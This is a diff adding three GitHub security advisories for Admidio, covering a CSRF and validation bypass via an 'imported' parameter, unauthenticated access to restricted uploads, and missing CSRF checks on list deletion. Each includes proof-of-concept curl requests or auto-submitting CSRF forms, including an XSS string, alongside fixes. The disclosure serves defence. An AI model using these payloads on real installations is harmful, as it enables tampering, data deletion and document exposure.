github
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-4rwm-c5mj-wh7x/GHSA-4rwm-c5mj-wh7x.json‎
Lines changed: 69 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-4rwm-c5mj-wh7x/GHSA-4rwm-c5mj-wh7x.json‎
Lines changed: 69 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-7fh7-8xqm-3g88/GHSA-7fh7-8xqm-3g88.json‎
Lines changed: 65 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-7fh7-8xqm-3g88/GHSA-7fh7-8xqm-3g88.json‎
Lines changed: 65 additions & 0 deletions
diff --git a/‎advisories/github-reviewed/2026/03/GHSA-g3mx-8jm6-rc85/GHSA-g3mx-8jm6-rc85.json‎
Lines changed: 68 additions & 0 deletions b/‎advisories/github-reviewed/2026/03/GHSA-g3mx-8jm6-rc85/GHSA-g3mx-8jm6-rc85.json‎
Lines changed: 68 additions & 0 deletions
@@ -0,0 +1,69 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-4rwm-c5mj-wh7x",
+  "modified": "2026-03-31T23:11:48Z",
+  "published": "2026-03-31T23:11:48Z",
+  "aliases": [
+    "CVE-2026-34383"
+  ],
+  "summary": "Admidio has CSRF and Form Validation Bypass in Inventory Item Save via `imported` Parameter",
+  "details": "## Summary\n\nThe inventory module's `item_save` endpoint accepts a user-controllable POST parameter `imported` that, when set to `true`, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the `FormPresenter` validation normally enforces.\n\n## Details\n\nIn `modules/inventory.php`, the `imported` parameter is read from POST input:\n\n**File:** `modules/inventory.php:50`\n```php\n$postImported = admFuncVariableIsValid($_POST, 'imported', 'bool', array('defaultValue' => false));\n```\n\nThis is then passed to `ItemService`:\n\n**File:** `modules/inventory.php:251-256`\n```php\n$itemService = new ItemService($gDb, $itemUuid, $postCopyField, $postCopyNumber, $postImported);\n$itemService->save(true);\n```\n\nInside `ItemService::save()`, the `postImported` flag completely skips CSRF and form validation:\n\n**File:** `src/Inventory/Service/ItemService.php:99-109`\n```php\npublic function save(bool $multiEdit = false): void\n{\n    global $gCurrentSession, $gL10n, $gSettingsManager;\n\n    // check form field input and sanitized it from malicious content\n    if (!$this->postImported) {\n        $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);\n        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);\n    } else {\n        $formValues = $_POST;   // Raw $_POST used with no CSRF check, no validation\n    }\n    // ... item data is saved using raw $formValues\n```\n\nWhen `imported=1` is sent, the code:\n1. Skips `$gCurrentSession->getFormObject()` — which validates the CSRF token\n2. Skips `$itemFieldsEditForm->validate()` — which sanitizes and validates field values\n3. Uses raw `$_POST` values directly to save to the database\n\nThis means:\n- CSRF protection is completely bypassed — an external website can trick a logged-in user into modifying inventory data\n- Form validation is bypassed — field type checks, required field checks, and input sanitization are all skipped\n- Raw user input flows into `$this->itemRessource->setValue()` and then `saveItemData()` without the normal server-side sanitization\n\n## PoC\n\n```bash\n# As an authenticated user with inventory access, save arbitrary item data\n# without a valid CSRF token and without form validation:\n\ncurl -X POST -b 'ADMIDIO_SESSION=<session>' \\\n  'https://admidio.local/modules/inventory.php?mode=item_save' \\\n  -d 'imported=1' \\\n  -d 'adm_csrf_token=anything' \\\n  -d 'INF-CATEGORY=1' \\\n  -d 'INF-ITEMNAME=<script>alert(1)</script>'\n\n# The CSRF token is not checked because imported=true skips the form object lookup.\n# The field value is not sanitized because validate() is skipped.\n```\n\nA CSRF attack page would look like:\n```html\n<html>\n<body>\n<form action=\"https://admidio.local/modules/inventory.php?mode=item_save\" method=\"POST\">\n  <input type=\"hidden\" name=\"imported\" value=\"1\" />\n  <input type=\"hidden\" name=\"adm_csrf_token\" value=\"dummy\" />\n  <input type=\"hidden\" name=\"INF-CATEGORY\" value=\"1\" />\n  <input type=\"hidden\" name=\"INF-ITEMNAME\" value=\"Attacker-controlled data\" />\n</form>\n<script>document.forms[0].submit();</script>\n</body>\n</html>\n```\n\n## Impact\n\n- **CSRF bypass**: An attacker can trick any logged-in inventory user into creating or modifying inventory items by having them visit a malicious page.\n- **Validation bypass**: Server-side field type validation, required field checks, and input sanitization are all skipped, allowing arbitrary data to be stored.\n- **Stored XSS potential**: Because `validate()` is bypassed, unsanitized input may be stored and later rendered to other users (dependent on output encoding in the view layer).\n\n## Recommended Fix\n\nRemove the `imported` parameter bypass from the save logic, or at minimum always validate the CSRF token regardless of the `imported` flag:\n\n```php\npublic function save(bool $multiEdit = false): void\n{\n    global $gCurrentSession, $gL10n, $gSettingsManager;\n\n    // ALWAYS validate CSRF token\n    $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);\n\n    if (!$this->postImported) {\n        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);\n    } else {\n        // For imported items, still validate the CSRF token (done above)\n        // and apply basic sanitization\n        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);\n    }\n    // ...\n}\n```\n\nAlternatively, the `imported` flag should only be set by the import workflow itself (via a session variable set during the import process), rather than being controllable via direct POST input.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "5.0.8"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.0.7"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4rwm-c5mj-wh7x"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34383"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/commit/00494b95dfe847af8b938e4397e5d909d8f36839"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-20",
+      "CWE-352"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:11:48Z",
+    "nvd_published_at": "2026-03-31T21:16:30Z"
+  }
+}
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7fh7-8xqm-3g88",
+  "modified": "2026-03-31T23:10:03Z",
+  "published": "2026-03-31T23:10:03Z",
+  "aliases": [
+    "CVE-2026-34381"
+  ],
+  "summary": "Admidio allows Unauthenticated Access to Role-Restricted documents via neutralized .htaccess",
+  "details": "### Summary\n\nAdmidio relies on `adm_my_files/.htaccess` to deny direct HTTP access to uploaded documents. The Docker image ships with `AllowOverride None` in the Apache configuration, which causes Apache to silently ignore all `.htaccess` files. As a result, any file uploaded to the\ndocuments module regardless of the _role-based_ permissions configured in the UI, is directly accessible over HTTP without authentication by anyone who knows the file path. The file path is disclosed in the upload response JSON.\n\n---\n\n### Root Cause\n\n**File 1: Intended protection (ignored):**  \n`adm_my_files/.htaccess`\n```apache\nRequire all denied\n```\n<img width=\"408\" height=\"403\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/95f0d389-a1a9-4dc4-9840-7f189d2c58ff\" />\n\n**File 2: Apache config that neutralizes it:**  \n\n* Command in order to search in Docker container: `docker exec admidio-sec-app cat /etc/apache2/apache2.conf`\n\n`/etc/apache2/apache2.conf` (Docker image)\n```apache\n<Directory ${APACHE_DOCUMENT_ROOT}>\n    AllowOverride None\n</Directory>\n```\n\n<img width=\"492\" height=\"328\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/2f2e09b1-0c2e-4932-8698-a40f6b92e917\" />\n\n\n`AllowOverride None` instructs Apache to skip `.htaccess` processing entirely, the deny rule never executes. The upload directory is inside the web root at `/opt/app-root/src/adm_my_files/` and returns **HTTP 200** for direct requests.\n\n**File 3: Upload response leaks the direct URL:**  `system/file_upload.php`, upload response JSON:\n\n<img width=\"1528\" height=\"624\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/50e66fde-ff41-4efa-adc9-ceeb5b23a97d\" />\n\n```json\n{\n  \"files\": [{\n    \"name\": \"sensitive_poc.txt\",\n    \"url\": \"http://TARGET/adm_my_files/documents_research/TEST-SENSITIVE/sensitive_poc.txt\"\n  }]\n}\n```\n\n### Verified PoC\n\n**Step 1: Admin creates a restricted folder (visible only to Administrator role):**  \n> `modules/documents-files.php` → permissions set to role `Administrator` only.\n\n<img width=\"1161\" height=\"784\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/25d81e44-9a7c-4991-b72e-6e664d176695\" />\n\n**Step 2: Admin uploads a file to the restricted folder.**  \n> Upload response returns:\n```\nhttp://TARGET/adm_my_files/documents_research/TEST-SENSITIVE/sensitive_poc.txt\n```\n\n<img width=\"1239\" height=\"294\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/84c1bcd1-47d7-4115-ac0f-653b0a6d7301\" />\n\n**Step 3: Unauthenticated request retrieves the file:**\n```bash\ncurl -X GET 'http://TARGET/adm_my_files/documents_research/TEST-SENSITIVE/sensitive_poc.txt'\n# Response: full file contents — no authentication required\n```\n\n<img width=\"1051\" height=\"150\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/1ed7fab7-59cb-4d5b-8c60-12108490d1e4\" />\n\n**Step 4: Confirm folder is role-restricted:**\n```sql\nSELECT fil_name, fol_name, fol_public FROM adm_files JOIN adm_folders ON fil_fol_id = fol_id \nORDER BY fil_id DESC LIMIT 5; -- fol_public = 0, role restricted — yet file is publicly accessible\n```\n---\n\n### Impact\n\n- Any document uploaded to **Admidio** including files restricted to specific roles is publicly accessible via direct HTTP request with no authentication required\n- **Role-based** access control on the documents module is completely bypassed at the filesystem level\n- Sensitive organizational documents (contracts, member data, financial records) are exposed to anyone who can guess or construct the file path\n- The upload API response discloses the direct URL to the uploader, making path enumeration trivial\n\n### Recommended Fix\n\n**Option 1 (preferred): Enable AllowOverride in Apache config:**\n```apache\n<Directory /opt/app-root/src/adm_my_files>\n    AllowOverride All\n</Directory>\n```\n\n**Option 2: Move uploads outside the web root:**  \nStore uploaded files in a directory outside `DOCUMENT_ROOT` and serve them exclusively through Admidio's download handler (`modules/documents-files.php?mode=download`), which enforces role checks before serving the file.\n\n**Option 3: Apache-level explicit deny (does not require .htaccess):**\n```apache\n<Directory /opt/app-root/src/adm_my_files>\n    Require all denied\n</Directory>\n```\n> The most robust long-term fix is Option 2 — moving uploads outside the web root eliminates the dependency on Apache configuration correctness entirely.\n\n**Reported by:** Juan Felipe Oz [@JF0x0r](https://x.com/PwnedRar_)\n> [LinkedIn](https://www.linkedin.com/in/juanfelipeoz/)",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "5.0.0"
+            },
+            {
+              "fixed": "5.0.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-7fh7-8xqm-3g88"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34381"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/commit/5f770c1ca81a4f6b02136280cd63316a35aabaaf"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-284"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:10:03Z",
+    "nvd_published_at": "2026-03-31T21:16:30Z"
+  }
+}
@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-g3mx-8jm6-rc85",
+  "modified": "2026-03-31T23:10:41Z",
+  "published": "2026-03-31T23:10:41Z",
+  "aliases": [
+    "CVE-2026-34382"
+  ],
+  "summary": "Admidio has Missing CSRF Protections on Custom List Deletion in mylist_function.php",
+  "details": "### Summary\n\nThe `delete` mode handler in `mylist_function.php` permanently deletes list configurations without validating a CSRF token. An attacker who can lure an authenticated user to a malicious page can silently destroy that user's list configurations — including organization-wide shared lists when the victim holds administrator rights.\n\n### Vulnerable Code\nFile: `modules/groups-roles/mylist_function.php`\n\nThe CSRF token validation at lines **81–82** is scoped exclusively to the save, save_as, and save_temporary modes:\n\n```php\n// Line 81-82 — only runs for save modes\n$categoryReportConfigForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);\nif ($_POST['adm_csrf_token'] !== $categoryReportConfigForm->getCsrfToken()) {\n    throw new Exception('Invalid or missing CSRF token!');\n}\n```\n\n<img width=\"857\" height=\"162\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/caec390e-ba6f-40f0-bb9c-a8870679da3d\" />\n\nThe `delete` case at lines **159–161** executes the destructive operation with no token check:\n\n```php\n} elseif ($getMode === 'delete') {\n    // delete list configuration\n    $list->delete();  // no CSRF validation\n    echo json_encode(array('status' => 'success', ...));\n    exit();\n}\n```\n\n<img width=\"560\" height=\"133\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/2d5eff8e-bbce-49b9-b6d5-77f4e2e6db69\" />\n\nA global input guard at lines **40–48** requires a non-empty `column[]` POST parameter for all modes including `delete`. This guard serves no security purpose for deletion, it exists for save validation but it must be satisfied to reach the delete handler. Any static value such as `LAST_NAME` is sufficient.\n\n### Impact\n\nAny authenticated user with list edit permission can be targeted. Admidio ships with six organization-wide shared lists (`lst_global = 1`): Address list, Phone list, Contact information, Membership, Members, and Contacts. When an administrator is the CSRF victim, these global lists are permanently deleted affecting all members of the organization. There is no soft-delete or recovery mechanism.\n\n---\n\n### Proof of Concept\n\n> First my video PoC, after that, the proof of concept with detail. \n\n[Watch Video](https://drive.google.com/file/d/1STAIDs32dTKCrQ4E-4BNMOO75ssSk48q/view?usp=sharing)\n\n* Prerequisites: Victim is authenticated in Admidio. Attacker knows the target list UUID (visible in the page URL at modules/groups-roles/mylist.php?list_uuid=...)\n\n1. Step 1: Attacker serves this page from any HTTP origin:\n\n```html\n<!DOCTYPE html>\n<html>\n<body>\n  <form id=\"f\" method=\"POST\"\n    action=\"http://TARGET/modules/groups-roles/mylist_function.php?mode=delete&list_uuid=TARGET_UUID\">\n    <input type=\"hidden\" name=\"column[]\" value=\"LAST_NAME\">\n  </form>\n  <script>document.getElementById('f').submit();</script>\n</body>\n</html>\n```\n\n> Since browsers block CSRF files, I did the proof of concept by setting up a local server with Python on the 9090. ok? \n\n2. Step 2: Victim visits the attacker page while logged into Admidio.\n3. Step 3: Server responds immediately:\n\n```json\n{\"status\":\"success\",\"url\":\".../modules/groups-roles/mylist.php\"}\n```\n\n4. Step 4: List is permanently deleted. Verified via:\n```sql\nSELECT lst_name FROM adm_lists WHERE lst_uuid='TARGET_UUID';\n-- Empty result set\n```\n> No `adm_csrf_token` field is required anywhere in the request.\n\n### Recommendation Fix: \n\n> It's so simple. \n\n* Apply the same `SecurityUtils::validateCsrfToken()` pattern already used in the save modes:\n\n```php\n} elseif ($getMode === 'delete') {\n    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n    $list->delete();\n    echo json_encode(array('status' => 'success', ...));\n    exit();\n}\n```\n\nAdditionally, the `column[]` input guard at lines **40–48** should be moved inside the `in_array($getMode, ['save', 'save_as', 'save_temporary'])` block, since delete requires no column data and the guard currently forces attackers to include a trivially satisfiable dummy value.\n\n<img width=\"751\" height=\"240\" alt=\"imagen\" src=\"https://github.com/user-attachments/assets/607510b9-64a9-49fb-8806-604b651d31a8\" />\n\n**Reported by:** Juan Felipe Oz [@JF0x0r](https://x.com/PwnedRar_)\n> [LinkedIn](https://www.linkedin.com/in/juanfelipeoz/)",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "5.0.0"
+            },
+            {
+              "fixed": "5.0.8"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 5.0.7"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-g3mx-8jm6-rc85"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34382"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/commit/317ec91ad3baf19d4179db6c32413812eb36d7ca"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-352"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-31T23:10:41Z",
+    "nvd_published_at": "2026-03-31T21:16:30Z"
+  }
+}